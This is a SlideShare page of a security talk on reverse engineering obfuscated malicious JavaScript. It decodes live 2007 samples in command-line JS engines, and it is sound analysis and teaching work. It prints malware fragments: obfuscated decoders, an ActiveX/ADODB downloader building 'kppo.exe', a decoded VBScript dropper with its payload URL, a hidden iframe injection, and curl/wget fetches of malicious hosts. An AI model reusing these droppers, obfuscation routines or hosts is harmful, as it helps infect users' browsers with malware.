SlideShare a Scribd company logo

Reverse Engineering Malicious Javascript

Y
Yusuf Motiwala

The document discusses techniques for reverse engineering obfuscated malicious JavaScript code. It begins by explaining that attackers obfuscate exploits to avoid detection. It then covers different approaches for decoding obfuscated JavaScript, including using tools like NJS to run the code outside a browser. An iterative process of running samples through these tools and decoding layers is demonstrated. The goal is to defeat obfuscation techniques and understand the underlying malicious behavior.

Related slideshows

Information Assurance And Security - Chapter 2 - Lesson 4
Information Assurance And Security - Chapter 2 - Lesson 4Information Assurance And Security - Chapter 2 - Lesson 4
Information Assurance And Security - Chapter 2 - Lesson 4
 
CyberOps Associate Modul 23 Endpoint Vulnerability Assessment
CyberOps Associate Modul 23 Endpoint Vulnerability AssessmentCyberOps Associate Modul 23 Endpoint Vulnerability Assessment
CyberOps Associate Modul 23 Endpoint Vulnerability Assessment
 
Walk This Way: CIS CSC and NIST CSF is the 80 in the 80/20 rule
Walk This Way: CIS CSC and NIST CSF is the 80 in the 80/20 ruleWalk This Way: CIS CSC and NIST CSF is the 80 in the 80/20 rule
Walk This Way: CIS CSC and NIST CSF is the 80 in the 80/20 rule
 
1 of 53
Download to read offline
Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net>
Problem, Solution, You Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. arbornetworks.com Page 2 Company Confidential
JavaScript Introduction • Created by Netscape, in almost all browsers now • In-browser scripting • Mix of procedural and OOP • Supports events, regular expressions • Everything is a reference, even functions arbornetworks.com Page 3 Company Confidential
Confusion: Mixed Programming Styles • quot;newquot; keyword to create an object • Nest functions mean classes and methods • Make a function function add(x, y) { return x + y; } arbornetworks.com Page 4 Company Confidential
OOP JavaScript • Make a class with methods function MyNumber() { function add(x, y) { return x + y; } } n = new MyNumber() print(n.add(1, 2)); arbornetworks.com Page 5 Company Confidential
Getting JavaScript to the Browser • Embed in page <script language=quot;JavaScript”> document.write(quot;Hello, world!quot;); </script> • Specify a file to include <script src=quot;path/to/file”></script> arbornetworks.com Page 6 Company Confidential
References • JavaScript Guide – http://wp.netscape.com/eng/mozilla/3.0/handbook/javas cript/ • JavaScript Language Resources – http://developer.mozilla.org/en/docs/JavaScript_L anguage_Resources • JavaScript: The Definitive Guide, Fifth Edition – http://www.oreilly.com/catalog/jscript5/ arbornetworks.com Page 7 Company Confidential
Object Hierarchy • Browser – Window • History • Location • Document arbornetworks.com Page 8 Company Confidential
JavaScript: The Definitive Guide By David Flannagan; ISBN: 1-56592-235-2, 637 pages. Second Edition, January 1997 arbornetworks.com Page 9 Company Confidential
Important Objects • Document – The current HTML – Methods • write() • writeln() • Location – Where you currently are (URL) – Methods • reload() • replace() arbornetworks.com Page 10 Company Confidential
Global Functions We Care About •print() -- print the arguments to stdout •eval() -- treat the arguments as code to execute •encode() -- convert to ASCII %xx expressions •decode() -- convert from ASCII %xx expressions •alert() -- displays a modal browser dialog •+ operator -- concatenate strings (like Java) arbornetworks.com Page 11 Company Confidential
Events We Care About •onLoad() -- execute a code block when the window loads •onUnload() -- execute a code block when the window closes or changes •onSubmit() -- executes a code block when a form is submitted arbornetworks.com Page 12 Company Confidential
What is Malicious JavaScript? • Delivers browser exploits – ADODB.Stream(), setSlice(), etc • Often drops ActiveX/VBScript content • Used to download malware onto the system • Obfuscation to avoid simple signatures arbornetworks.com Page 13 Company Confidential
What is Obfuscated JavaScript? • Simple: JavaScript with opaque code to thwart static review • Hides author’s methods and intents • Varying degrees of obfuscation • FromCode() - Simple ASCII chr(), ord() • Base64 encoding – iWebTool HTML Encrypt • http://www.iwebtool.com/html_encrypter • String splits • Customer encoder – Advanced HTML Protector • http://www.creabit.com/htmlprotect/ arbornetworks.com Page 14 Company Confidential
Simple Base64 Encode arbornetworks.com Page 15 Company Confidential
Simple Decode with NJS • Strip <script> and HTML tags • Change document.write() to print() $ js iweb.js <html> <head> <title>Hello</title> </head> <body> <h1>Hello there.</h1> </body> </html> arbornetworks.com Page 16 Company Confidential
Simple String Join Example function ravlhhwx(zxnkfzz) { gqibom = quot;Gquot;+quot;Equot;+quot;Tquot;; var mjb = quot;http://www.newoldway.info/c/1900/counter21.php?a=3&c=3quot;; runbj = quot;Xquot;+quot;Mquot;+quot;LHquot;+quot;TTPquot;; var gzfzi = zxnkfzz.CreateObject(quot;Scriptiquot;+quot;nquot;+quot;gquot;+quot;.quot;+quot;FileSystquot;+quot;emObjectquot;, quot;quot;) juezny = quot;Shequot;+quot;llquot;; ifhhye = quot;Aquot;+quot;DOquot;+quot;DBquot; vkdvhle = quot;kppoquot;+quot;.exequot;; wrrb = quot;.quot;; jyknv = quot;GETquot;; daxhi = quot;Aquot;+quot;pplicaquot;+quot;tionquot;; vvu = quot;.quot;; rramwz = quot;Squot;+quot;tquot;+quot;rquot;+quot;equot;+quot;amquot;; ybxbb = quot;MSquot;+quot;Xquot;+quot;MLquot;+quot;2quot;; … Simple string splits and joins, builds an AJAX object arbornetworks.com Page 17 Company Confidential
More Complicated Example dF('%2A8HXhwnuy%2A75Qfslzflj%2A8I%2A7%3COf %7BfXhwnuy%2A7%3C%2A8Jithzrjsy3%7Cwnyj%2A7 %3D%2A7%3C%2A8H%2A7Kyj%7Dyfwjf%2A8J%2A%3AH %2A7%3C%2A77%2A8J%2A7%3C%2A7%3E%2A8Gnk%2A7 %3Dithzrjsy3ZWQ3xzgxywnsl%2A7%3D5%2A7H9%2A 7%3E%2A8I%2A8I%2A7%3Cmyyu%2A7%3C%2A7%… What the heck is dF()? A custom decoder. What is this code doing? Let’s find out. arbornetworks.com Page 18 Company Confidential
Two Options … • Manually XOR, mask, array lookup, etc … Or brute force • I chose brute force, I’m lazy • How? Get the JavaScript to the point where the browser could actually use it arbornetworks.com Page 19 Company Confidential
Bad Idea: Using the Browser • Several people like to do this • Wrap questionable JavaScript in <textarea> tags – document.write() will wind up there – eval() will still work • Replace document.write() with alert() – Suggestions from http://handlers.sans.org/dwesemann/decode/index.html • Good luck getting full info from a browser under 0day conditions – Increasing amount of browser-based debugging attacks and defenses arbornetworks.com Page 20 Company Confidential
Better Idea: Divorce the JS Engine from the Browser NJS SpiderMonkey Rhino (Jscript in Java) arbornetworks.com Page 21 Company Confidential
Decoding Malicious JS On The CLI • Cut and paste JavaScript code body or bodies into a file • Strip any extraneous HTML tags – These JS tools don’t understand HTML • Save file • Evaluate with NJS js(1) arbornetworks.com Page 22 Company Confidential
NJS JavaScript Toolkit • NJS is an independent implementation of the JavaScript language developed by Netscape and standardized by ECMA. It is designed to be re-entrant, extendible, fast, and programmable. • http://www.njs-javascript.org/ • Builds on OS X, UNIX, etc … arbornetworks.com Page 23 Company Confidential
Cleaning Up The Mess • Change eval() to print() • Change document.write() to print – Alternatively create a document object with a write() method (equivilent to print()) • Prepend all of the needed bits arbornetworks.com Page 24 Company Confidential
Iterative Example Cut and paste malicious JS body $ cat mal.js var h=quot;+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<- p hy4xBA9W?T6/18… Now try and execute $ js mal.js VM: warning: using undefined global `document' js: evaluation of file `mal.js' failed: StringStream:0: illegal object for call_method arbornetworks.com Page 25 Company Confidential
Iterative Example (cont) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y. charAt(z);w=h.indexOf(q);if(w>- 1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} VM: warning: using undefined global `i' js: evaluation of file `mal.js' failed: mal.js:8: illegal function object in jsr arbornetworks.com Page 26 Company Confidential
Iterative Example (cont) • Code in red is a decryptor we need in the page • Cut and paste this function i() into the head of mal.js • Rerun through js(1) arbornetworks.com Page 27 Company Confidential
Iterative Example (concl) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y.charAt(z);w=h.ind exOf(q);if(w>-1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} <script language=quot;JavaScriptquot; type=quot;text/javascriptquot;> var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+68; vuln_y= window.screenTop-19; //vuln_w= 420; vuln_w= root.offsetWidth-220; vuln_h= 17; vuln_show(); }… arbornetworks.com Page 28 Company Confidential
Double Decodes • Clean up HTML • Decode on the CLI • Result: More encoding! • Repeat until it’s not encoded any longer arbornetworks.com Page 29 Company Confidential
Example (Week of March 21, 2007) $ curl http://58.65.239.106/cosmos/gcs_1/ | tee mal.js <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,22,45,3 2,14,57,50,40,62,0,0,0,0,0,0,49,25,24,18,43,16,5,8,30,15, 54,35,17,11,33,56,47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36 ,0,46,52,37,44,42,21,6,39,19,20,29,34,1,13,27,59,10,61,2, 12,31,60,9,38,53,28);for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;i--,l-- ){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;qsq84VRO9ua6 qqr@gizJE59pjsecG1dQiiw84sec6h59KDP0qVv7ZYvYMYvQ1lG08hu7B IdJHKGc4e8lqsU6FpvYg0zrUPdYsuwlsp3YVTANF9R_Z76hZlAxiCOxV7 ANw1zJS1zJFJz7A10xFJvQHi8JsDkctId@Iu6QC0tl4selqeOOt… arbornetworks.com Page 30 Company Confidential
Prepare The Decode function MyDoc () { function write(x) { print(x); } } document = new MyDoc(); // delete HTML tags function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array( 63,23,22,45,32,14,57,50,40,62,0,0,0,0,0,0,49 ,25,24,18,43,16,5,8,30,15,54,35,17,11,33,56, 47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36,0… arbornetworks.com Page 31 Company Confidential
Execute the Decode $ js mal.js <HTML xmlns:IE> <body> <SCRIPT language=quot;VBScriptquot;> Module_Path=quot;http://58.65.239.106/cosmos/gcs_1/get.php?file=exequot; If navigator.appName=quot;Microsoft Internet Explorerquot; Then If InStr(navigator.platform,quot;Win32quot;) <> 0 Then Const ssfFONTS=20 Const adModeReadWrite=3 Const adTypeBinary=1 Const adSaveCreateOverWrite=2 … arbornetworks.com Page 32 Company Confidential
Refetch, Smaller JScript <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,15,24 ,60,26,0,2,52,5,42,0,0,0,0,0,0,23,28,58,51,25,39,12, 10,33,17,53,14,29,37,1,46,6,43,4,18,9,62,59,54,30,20 ,47,0,0,0,0,8,0,22,34,7,36,3,41,38,49,27,55,31,32,57 ,21,56,45,40,19,61,13,50,48,35,16,11,44);for(j=Math. ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i-- ,l--){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>= 8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;G4Du1rz j1wtMm@FW21sbGKkhkQooBQovDQ_uP@AuN0zCR4DHT0FhX0FWY6quot; )</script> arbornetworks.com Page 33 Company Confidential
Execute … Enjoy! $ js mal1.js <center>Sorry! You IP is blocked.</center> arbornetworks.com Page 34 Company Confidential
Life Isn’t Always This Easy • Lots of defensive JavaScript coming around • Kills all sorts of inspection routines • Don’t run this in the browser! arbornetworks.com Page 35 Company Confidential
Sneaky Example $ wget --user-agent=' ' -m http://www.99express.com/indexxx.html <HTML><SCRIPT LANGUAGE=quot;JavaScriptquot;> </div><div id=Decoding Sneaky … Clean up Jscript, remove HTML Execute in js(1) $ js -g indexxx.js js: evaluation of file `indexxx.js' failed: indexxx.js:1: illegal object for call_method What’s wrong? var H74E49= arguments.callee.toString(). replace(/W/g,quot;quot;).toUpperCase(); NJS js(1) doesn’t know about ‘arguments’ arbornetworks.com Page 37 Company Confidential
arguments.callee … • Self reference … callee is a property of the arguments local variable available within all function objects; callee as a property of Function.arguments is no longer used. (Function.arguments itself is also deprecated.) arguments.callee allows anonymous functions to refer to themselves, which is necessary for recursive anonymous functions. • Source: Core JavaScript 1.5 Reference: Functions:arguments:callee, Mozilla website • Often used as a tamper-proof method arbornetworks.com Page 38 Company Confidential
Enter SpiderMonkey • SpiderMonkey is the code-name for the Mozilla's C implementation of JavaScript. • http://www.mozilla.org/js/spidermonkey/ • Builds on UNIX, OS X, etc arbornetworks.com Page 39 Company Confidential
Making Sneaky Work Prepend a working document object (my basic document object doesn’t work with SpiderMonkey) function my_document () { // a property (initialized to string) this.m_property=quot;quot;; this.write=function(string) { print(quot;my_document::writequot;); print(string); } }; // declare a globally-accessible document object var document=new my_document(); From http://www.websense.com/securitylabs/blog/blog.php?BlogID=98 arbornetworks.com Page 40 Company Confidential
Run it Through SpiderMonkey $ cat jose.html | ./js my_document::write </textarea><iframe src=quot;http://ibm- ssl.com:81/cgi-bin/nsp.cgi?p=buyquot; width=1 height=1 style=quot;border: 0pxquot;></iframe> • Notice the close textarea tag • Code also will barf on alert() • Notice that the decode array expected the full decode function • Cannot mess with it via print() or alert()! arbornetworks.com Page 41 Company Confidential
Sometimes We Need Other Tools • Sometimes NJS js(1) will barf on some character codes • What do we do? We call out to another language • I like Python so … • s = <array of numbers as a Python tuple> • … for i in s: r += chr(s) … arbornetworks.com Page 42 Company Confidential
Malicious JScript in the Large • NeoSploit • Similar to Web Attacker framework • Lots of exploits • Enumerates vulnerable components – Web browser – Accessible CLSIDs – At least 7 different exploits • Fingerprints you quickly • Launches the right exploit arbornetworks.com Page 43 Company Confidential
Where We See This Stuff Day to Day • Feebs worm – Convoluted JavaScript body drops a VBScript malware reassembler • ADODB.Stream() exploits – Usually grab a first stage EXE • Other ActiveX exploits – Often mutliple CLSIDs stacked in one malicious web page arbornetworks.com Page 44 Company Confidential
Tools and Tips • curl(1) and wget(1) are your friend – Learn how to set your own Referrer and User-Agent fields • Don’t use a vulnerable browser when you’re doing this work • tee(1) or script(1) most of your cmdline work • My favorite platforms: UNIX, OS X arbornetworks.com Page 45 Company Confidential
Unsolved Problems • No complement to js(1) for VBScript … anyone? – Suggestion: WINE with cscript.exe • RELIABLE generic detection – IDS, IPS sigs – Browser plugins • Non-browser based honeyclients don’t understand JS – Bolt in SpiderMonkey C bindings? arbornetworks.com Page 46 Company Confidential
Bonus Material: Flash Malware • Flash can contain JavaScript actions within • These JavaScript actions can affect the browser • Tool of choice: Flasm – Flasm is a free command line assembler/disassembler of Flash ActionScript bytecode. – http://flasm.sourceforge.net/ arbornetworks.com Page 47 Company Confidential
Phlash Redirection Real Example from December 10, 2006 http://i127.photobucket.com/albums/p126/click2es/prize.swf $ flasm -d /home/jose/malware/10dec06/i127.photobucket.com/albums/p126/c lick2es/prize.swf Flasm configuration file flasm.ini not found, using default values movie '/home/jose/ … /prize.swf' compressed // flash 6, total frames: 1, frame rate: 12 fps, 50x40 px frame 0 getURL 'http://www.fair- faxy.com/Signin.eBay.com.ws.eBayISAPI.dslSignInco.partnerId.p UserId.siteid.pageType.pa1.i1.BshowGif.UsingSSL.https.ebay.co m.pa2.errmsg.runame.ruparams.ruproduct.sid.confirm5.htm' '_self' end // of frame 0 end arbornetworks.com Page 48 Company Confidential
Flash Exploit Downloader 22:45:30 < dfx> http://hiltonfreak.tripod.com/parishilton.swf frame 156 Downloads IRC Bot getURL 'javaplugin.zip' '_top' end // of frame 156 Archive: hiltonfreak.tripod.com/javaplugin.zip Length Date Time Name -------- ---- ---- ---- 13624 04-13-07 22:13 readme.txt 60960 04-13-07 21:44 javaplugin.exe -------- ------- arbornetworks.com Page 49 Company Confidential
Phishing in Flash • Call out to web components to build what appears to be a legit site • All run within a Flash object • Intercept data, process and steal • Huge decodes, but Flasm shows how it’s done arbornetworks.com Page 50 Company Confidential
Phlash Phishing 19 March 2007: http://200.29.161.100/1/capital2.swf … defineButton 164 on overDownToOverUp getURL 'http://www.capitalone.com/' '_blank' end end // of defineButton 164 defineButton 165 on overDownToOverUp getURL 'http://www.capitalone.com/legal/privacy.php' '_blank' end end // of defineButton 165 … arbornetworks.com Page 51 Company Confidential
Back to JavaScript • The bad guys are using JavaScript as their delivery vehicle • JavaScript: Learn it, love it • They’re limited by the fact that the JavaScript has to be decoded to be used by the browser • Their obfuscation tools are primitive but effective – But they require a human to analyze • They’ll continue to push the envelope – Malware2.0? arbornetworks.com Page 52 Company Confidential
Thank You Acknowledgements • A (wishes to remain anonymous) • Websense guys • Ken Dunham @ iDef • Joe Stewart @ SecureWorx • You arbornetworks.com Page 53 Company Confidential

More Related Content

Reverse Engineering Malicious Javascript

  • 1. Reverse Engineering Malicious Javascript Jose Nazario, Ph.D. <jose@arbor.net>
  • 2. Problem, Solution, You Bad guys want to get malware on your box. They don’t want your security systems to detect their known exploits. So they obfuscate them. By the end of this talk you’ll be armed with techniques to defeat their techniques. arbornetworks.com Page 2 Company Confidential
  • 3. JavaScript Introduction • Created by Netscape, in almost all browsers now • In-browser scripting • Mix of procedural and OOP • Supports events, regular expressions • Everything is a reference, even functions arbornetworks.com Page 3 Company Confidential
  • 4. Confusion: Mixed Programming Styles • quot;newquot; keyword to create an object • Nest functions mean classes and methods • Make a function function add(x, y) { return x + y; } arbornetworks.com Page 4 Company Confidential
  • 5. OOP JavaScript • Make a class with methods function MyNumber() { function add(x, y) { return x + y; } } n = new MyNumber() print(n.add(1, 2)); arbornetworks.com Page 5 Company Confidential
  • 6. Getting JavaScript to the Browser • Embed in page <script language=quot;JavaScript”> document.write(quot;Hello, world!quot;); </script> • Specify a file to include <script src=quot;path/to/file”></script> arbornetworks.com Page 6 Company Confidential
  • 7. References • JavaScript Guide – http://wp.netscape.com/eng/mozilla/3.0/handbook/javas cript/ • JavaScript Language Resources – http://developer.mozilla.org/en/docs/JavaScript_L anguage_Resources • JavaScript: The Definitive Guide, Fifth Edition – http://www.oreilly.com/catalog/jscript5/ arbornetworks.com Page 7 Company Confidential
  • 8. Object Hierarchy • Browser – Window • History • Location • Document arbornetworks.com Page 8 Company Confidential
  • 9. JavaScript: The Definitive Guide By David Flannagan; ISBN: 1-56592-235-2, 637 pages. Second Edition, January 1997 arbornetworks.com Page 9 Company Confidential
  • 10. Important Objects • Document – The current HTML – Methods • write() • writeln() • Location – Where you currently are (URL) – Methods • reload() • replace() arbornetworks.com Page 10 Company Confidential
  • 11. Global Functions We Care About •print() -- print the arguments to stdout •eval() -- treat the arguments as code to execute •encode() -- convert to ASCII %xx expressions •decode() -- convert from ASCII %xx expressions •alert() -- displays a modal browser dialog •+ operator -- concatenate strings (like Java) arbornetworks.com Page 11 Company Confidential
  • 12. Events We Care About •onLoad() -- execute a code block when the window loads •onUnload() -- execute a code block when the window closes or changes •onSubmit() -- executes a code block when a form is submitted arbornetworks.com Page 12 Company Confidential
  • 13. What is Malicious JavaScript? • Delivers browser exploits – ADODB.Stream(), setSlice(), etc • Often drops ActiveX/VBScript content • Used to download malware onto the system • Obfuscation to avoid simple signatures arbornetworks.com Page 13 Company Confidential
  • 14. What is Obfuscated JavaScript? • Simple: JavaScript with opaque code to thwart static review • Hides author’s methods and intents • Varying degrees of obfuscation • FromCode() - Simple ASCII chr(), ord() • Base64 encoding – iWebTool HTML Encrypt • http://www.iwebtool.com/html_encrypter • String splits • Customer encoder – Advanced HTML Protector • http://www.creabit.com/htmlprotect/ arbornetworks.com Page 14 Company Confidential
  • 15. Simple Base64 Encode arbornetworks.com Page 15 Company Confidential
  • 16. Simple Decode with NJS • Strip <script> and HTML tags • Change document.write() to print() $ js iweb.js <html> <head> <title>Hello</title> </head> <body> <h1>Hello there.</h1> </body> </html> arbornetworks.com Page 16 Company Confidential
  • 17. Simple String Join Example function ravlhhwx(zxnkfzz) { gqibom = quot;Gquot;+quot;Equot;+quot;Tquot;; var mjb = quot;http://www.newoldway.info/c/1900/counter21.php?a=3&c=3quot;; runbj = quot;Xquot;+quot;Mquot;+quot;LHquot;+quot;TTPquot;; var gzfzi = zxnkfzz.CreateObject(quot;Scriptiquot;+quot;nquot;+quot;gquot;+quot;.quot;+quot;FileSystquot;+quot;emObjectquot;, quot;quot;) juezny = quot;Shequot;+quot;llquot;; ifhhye = quot;Aquot;+quot;DOquot;+quot;DBquot; vkdvhle = quot;kppoquot;+quot;.exequot;; wrrb = quot;.quot;; jyknv = quot;GETquot;; daxhi = quot;Aquot;+quot;pplicaquot;+quot;tionquot;; vvu = quot;.quot;; rramwz = quot;Squot;+quot;tquot;+quot;rquot;+quot;equot;+quot;amquot;; ybxbb = quot;MSquot;+quot;Xquot;+quot;MLquot;+quot;2quot;; … Simple string splits and joins, builds an AJAX object arbornetworks.com Page 17 Company Confidential
  • 18. More Complicated Example dF('%2A8HXhwnuy%2A75Qfslzflj%2A8I%2A7%3COf %7BfXhwnuy%2A7%3C%2A8Jithzrjsy3%7Cwnyj%2A7 %3D%2A7%3C%2A8H%2A7Kyj%7Dyfwjf%2A8J%2A%3AH %2A7%3C%2A77%2A8J%2A7%3C%2A7%3E%2A8Gnk%2A7 %3Dithzrjsy3ZWQ3xzgxywnsl%2A7%3D5%2A7H9%2A 7%3E%2A8I%2A8I%2A7%3Cmyyu%2A7%3C%2A7%… What the heck is dF()? A custom decoder. What is this code doing? Let’s find out. arbornetworks.com Page 18 Company Confidential
  • 19. Two Options … • Manually XOR, mask, array lookup, etc … Or brute force • I chose brute force, I’m lazy • How? Get the JavaScript to the point where the browser could actually use it arbornetworks.com Page 19 Company Confidential
  • 20. Bad Idea: Using the Browser • Several people like to do this • Wrap questionable JavaScript in <textarea> tags – document.write() will wind up there – eval() will still work • Replace document.write() with alert() – Suggestions from http://handlers.sans.org/dwesemann/decode/index.html • Good luck getting full info from a browser under 0day conditions – Increasing amount of browser-based debugging attacks and defenses arbornetworks.com Page 20 Company Confidential
  • 21. Better Idea: Divorce the JS Engine from the Browser NJS SpiderMonkey Rhino (Jscript in Java) arbornetworks.com Page 21 Company Confidential
  • 22. Decoding Malicious JS On The CLI • Cut and paste JavaScript code body or bodies into a file • Strip any extraneous HTML tags – These JS tools don’t understand HTML • Save file • Evaluate with NJS js(1) arbornetworks.com Page 22 Company Confidential
  • 23. NJS JavaScript Toolkit • NJS is an independent implementation of the JavaScript language developed by Netscape and standardized by ECMA. It is designed to be re-entrant, extendible, fast, and programmable. • http://www.njs-javascript.org/ • Builds on OS X, UNIX, etc … arbornetworks.com Page 23 Company Confidential
  • 24. Cleaning Up The Mess • Change eval() to print() • Change document.write() to print – Alternatively create a document object with a write() method (equivilent to print()) • Prepend all of the needed bits arbornetworks.com Page 24 Company Confidential
  • 25. Iterative Example Cut and paste malicious JS body $ cat mal.js var h=quot;+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<- p hy4xBA9W?T6/18… Now try and execute $ js mal.js VM: warning: using undefined global `document' js: evaluation of file `mal.js' failed: StringStream:0: illegal object for call_method arbornetworks.com Page 25 Company Confidential
  • 26. Iterative Example (cont) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y. charAt(z);w=h.indexOf(q);if(w>- 1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} VM: warning: using undefined global `i' js: evaluation of file `mal.js' failed: mal.js:8: illegal function object in jsr arbornetworks.com Page 26 Company Confidential
  • 27. Iterative Example (cont) • Code in red is a decryptor we need in the page • Cut and paste this function i() into the head of mal.js • Rerun through js(1) arbornetworks.com Page 27 Company Confidential
  • 28. Iterative Example (concl) $ js mal.js function i(y){var f='',z,q,w,v;for(z=0;z<y.length;z++){q=y.charAt(z);w=h.ind exOf(q);if(w>-1){v=((w+1)%x- 1);if(v<=0){v+=x}f+=h.charAt(v- 1)}else{f+=q}}c+=f};function jjj(){document.write(c);g=quot;quot;} <script language=quot;JavaScriptquot; type=quot;text/javascriptquot;> var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+68; vuln_y= window.screenTop-19; //vuln_w= 420; vuln_w= root.offsetWidth-220; vuln_h= 17; vuln_show(); }… arbornetworks.com Page 28 Company Confidential
  • 29. Double Decodes • Clean up HTML • Decode on the CLI • Result: More encoding! • Repeat until it’s not encoded any longer arbornetworks.com Page 29 Company Confidential
  • 30. Example (Week of March 21, 2007) $ curl http://58.65.239.106/cosmos/gcs_1/ | tee mal.js <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,22,45,3 2,14,57,50,40,62,0,0,0,0,0,0,49,25,24,18,43,16,5,8,30,15, 54,35,17,11,33,56,47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36 ,0,46,52,37,44,42,21,6,39,19,20,29,34,1,13,27,59,10,61,2, 12,31,60,9,38,53,28);for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;i--,l-- ){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>=8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;qsq84VRO9ua6 qqr@gizJE59pjsecG1dQiiw84sec6h59KDP0qVv7ZYvYMYvQ1lG08hu7B IdJHKGc4e8lqsU6FpvYg0zrUPdYsuwlsp3YVTANF9R_Z76hZlAxiCOxV7 ANw1zJS1zJFJz7A10xFJvQHi8JsDkctId@Iu6QC0tl4selqeOOt… arbornetworks.com Page 30 Company Confidential
  • 31. Prepare The Decode function MyDoc () { function write(x) { print(x); } } document = new MyDoc(); // delete HTML tags function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array( 63,23,22,45,32,14,57,50,40,62,0,0,0,0,0,0,49 ,25,24,18,43,16,5,8,30,15,54,35,17,11,33,56, 47,51,41,7,3,58,26,48,0,55,4,0,0,0,0,36,0… arbornetworks.com Page 31 Company Confidential
  • 32. Execute the Decode $ js mal.js <HTML xmlns:IE> <body> <SCRIPT language=quot;VBScriptquot;> Module_Path=quot;http://58.65.239.106/cosmos/gcs_1/get.php?file=exequot; If navigator.appName=quot;Microsoft Internet Explorerquot; Then If InStr(navigator.platform,quot;Win32quot;) <> 0 Then Const ssfFONTS=20 Const adModeReadWrite=3 Const adTypeBinary=1 Const adSaveCreateOverWrite=2 … arbornetworks.com Page 32 Company Confidential
  • 33. Refetch, Smaller JScript <script language=JavaScript>function makemelaugh(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,15,24 ,60,26,0,2,52,5,42,0,0,0,0,0,0,23,28,58,51,25,39,12, 10,33,17,53,14,29,37,1,46,6,43,4,18,9,62,59,54,30,20 ,47,0,0,0,0,8,0,22,34,7,36,3,41,38,49,27,55,31,32,57 ,21,56,45,40,19,61,13,50,48,35,16,11,44);for(j=Math. ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i-- ,l--){w|=(t[x.charCodeAt(p++)- 48])<<s;if(s){r+=String.fromCharCode(170^w&255);w>>= 8;s- =2}else{s=6}}document.write(r)}}makemelaugh(quot;G4Du1rz j1wtMm@FW21sbGKkhkQooBQovDQ_uP@AuN0zCR4DHT0FhX0FWY6quot; )</script> arbornetworks.com Page 33 Company Confidential
  • 34. Execute … Enjoy! $ js mal1.js <center>Sorry! You IP is blocked.</center> arbornetworks.com Page 34 Company Confidential
  • 35. Life Isn’t Always This Easy • Lots of defensive JavaScript coming around • Kills all sorts of inspection routines • Don’t run this in the browser! arbornetworks.com Page 35 Company Confidential
  • 36. Sneaky Example $ wget --user-agent=' ' -m http://www.99express.com/indexxx.html <HTML><SCRIPT LANGUAGE=quot;JavaScriptquot;> <!-- function K508A7(B2B5E7){var H74E49=arguments.callee.toString().replace(/W/g,quot;quot;).to UpperCase();var Q10CCF;var UAC893=H74E49.length;var D9C672;var AEEA53;var R72B7F=quot;quot;;var E9B774=new Array(0,1996959894,3993919788,2567524794,124634137,1886 057615,3915621685,2657392035,249268274,2044508324,37721 15230,2547177864,162941995,2125561021,3887607047,242844 4049,498536548,1789927666,4089016648,2227061214,4505488 61,1843258603,4107580753,2211677639,325883990,168477715 2,4251122042,2321926636,335633487,16613… So far this just looks like a more convoluted encoder arbornetworks.com Page 36 Company Confidential
  • 37. Decoding Sneaky … Clean up Jscript, remove HTML Execute in js(1) $ js -g indexxx.js js: evaluation of file `indexxx.js' failed: indexxx.js:1: illegal object for call_method What’s wrong? var H74E49= arguments.callee.toString(). replace(/W/g,quot;quot;).toUpperCase(); NJS js(1) doesn’t know about ‘arguments’ arbornetworks.com Page 37 Company Confidential
  • 38. arguments.callee … • Self reference … callee is a property of the arguments local variable available within all function objects; callee as a property of Function.arguments is no longer used. (Function.arguments itself is also deprecated.) arguments.callee allows anonymous functions to refer to themselves, which is necessary for recursive anonymous functions. • Source: Core JavaScript 1.5 Reference: Functions:arguments:callee, Mozilla website • Often used as a tamper-proof method arbornetworks.com Page 38 Company Confidential
  • 39. Enter SpiderMonkey • SpiderMonkey is the code-name for the Mozilla's C implementation of JavaScript. • http://www.mozilla.org/js/spidermonkey/ • Builds on UNIX, OS X, etc arbornetworks.com Page 39 Company Confidential
